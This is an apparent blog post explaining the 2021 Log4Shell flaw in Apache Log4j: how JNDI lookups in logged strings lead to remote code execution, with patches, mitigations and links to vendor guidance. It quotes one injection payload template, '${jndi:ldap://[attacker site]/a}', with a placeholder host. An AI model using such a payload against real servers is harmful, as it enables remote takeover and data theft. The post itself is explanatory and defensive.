As if we did not have enough worries with Delta and Omicron in the days leading to the December holiday season, the Internet is on fire with news about a software exploit that allows hackers to access Internets servers running the widely-used Apache Log4j Java-based logging library and execute their own custom malicious code on the server. The exploit allows hackers to access server data, make malicious changes to files and programs and in the worst case take control of the server.
The vulnerability is known by the names Log4Shell, LogJam and Log4j. The bug is considered critical and has scored a perfect 10 on 10 in the CVSS rating system. The bug was originally disclosed to Apache on November 24th by Chen Zhaojun of Alibaba Cloud Security Team (which is over 2 weeks ago).
The weakness is in a library that is used to log messages. It is difficult to fathom how a simple function that logs status messages into a file can be so dangerous. Like so many exploits we have seen before, the root of the problem is that the library allows the message string to result in execution of user-specified software. The string can contain a link to an external source (e.g., “${jndi:ldap://[attacker site]/a}”), which the library uses to fetch the external data and then evaluates it; if the fetched data is a java code fragment, then the library blindly “executes” it, resulting in the dreaded Remote Code Execution (RCE) exploit.
Temporary fixes to disable the vulnerable feature have been posted. The Apache Software Foundation has released a new software version (2.15.0) for the library.
Note that this exploit does not affect computer systems in the average home, even though many client apps use the library. It’s the server apps that can be exploited by remote malicious actors making our data and passwords saved in servers vulnerable.
Unfortunately, this library is used very widely and the exploit is very simple to use. It will take time for organizations to patch up all their installed versions of the software; meanwhile, this will be a Christmas gift for hackers who will be busy figuring out how to exploit it for profit, mischief and fun.
Marcus Hutchins, a prominent security researcher and hacker extraordinaire, best known for halting the global WannaCry malware attack, is worried -
The attack was first detected on servers of the gaming site Minecraft, but now it is much more widespread. It’s consequences are being referred to now by words such as “Mini Internet Meltdown” and “Javageddon”.
It is a race now between hackers and IT managers.
We will be seeing many such reports of attacks in the coming days -
I hope DailyKos IT staff is aware of this as well and is taking steps to upgrade the library.
The official logo of Log4Shell!
Some details for IT experts
From access.redhat.com/… —
Apache Log4j is a library for logging functionality in Java-based applications. A flaw was found in Apache Log4j 2 (an upgrade to Log4j), allowing a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's Java Naming and Directory Interface™ (JNDI) Lightweight Directory Access Protocol (LDAP) server lookup.
This flaw allows a remote attacker to execute code on the target system with the same privileges as the Java-based application that invoked Apache Log4j 2.
From www.mcafee.com/… —
The vulnerability exists in the way the Java Naming and Directory Interface (JNDI) feature resolves variables. When a JNDI reference is being written to a log, JNDI will fetch all requirements to resolve the variable. To complete this process, it will download and execute any remote classes required. This applies to both server-side and client-side applications since the main requirements for the vulnerability are any attacker-controlled input field and this input being passed to the log.
To orchestrate this attack, an attacker can use several different JNDI lookups. The most popular lookup currently being seen in both PoCs and active exploitation is utilizing LDAP; however, other lookups such as RMI and DNS are also viable attack vectors.
Lots of technical info at this site on how to the exploit works, how to detect the vulnerability and how to patch systems temporarily and permanently.
Detailed instructions from Microsoft -
Here is a site that is tracking the sources of these attacks. Organizations can block traffic from such sites while they upgrade their software.
The Vaccine
This tool developed by Cybereason uses the exploit itself to remotely temporarily “vaccinate” a vulnerable server by changing a server configuration variable called log4j2.formatMsgNoLookups to true, which effectively disables expansion of strings such as “${jndi:ldap:...” when writing log messages.
Epilogue
This will be a Christmas nightmare for many companies, their IT departments and their clients. Let’s hope IT security professional and U.S government agencies can stop this exploit from crippling this holiday season.
How do you think industry and government should address this growing scourge? Is it an intractable problem, given the way current software and the Internet is designed and our reliance on complex software systems designed using old-fashioned human-based methods? Is it a matter of will and investment? Should there be a Manhattan Project to address this issue? It is not just about stealing data or ransomware but also the ability of state and non-state bad actors to knock out critical infrastructure which we all depend on — power generation and distribution, pipelines, transportation, banks, hospitals, communications, election systems, weapon systems, …
Further Reading
- Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package — www.lunasec.io/…
- Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack — threatpost.com/…
- Log4Shell Vulnerability is the Coal in our Stocking for 2021 — www.mcafee.com/…
- ‘Extremely bad’ vulnerability found in widely used logging system — www.theverge.com/…
- Security warning: New zero-day in the Log4j Java library is already being exploited — www.zdnet.com/…
- Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation — www.microsoft.com/…
- Cybereason Releases Vaccine to Prevent Exploitation of Apache Log4Shell Vulnerability (CVE-2021-44228) — www.cybereason.com/...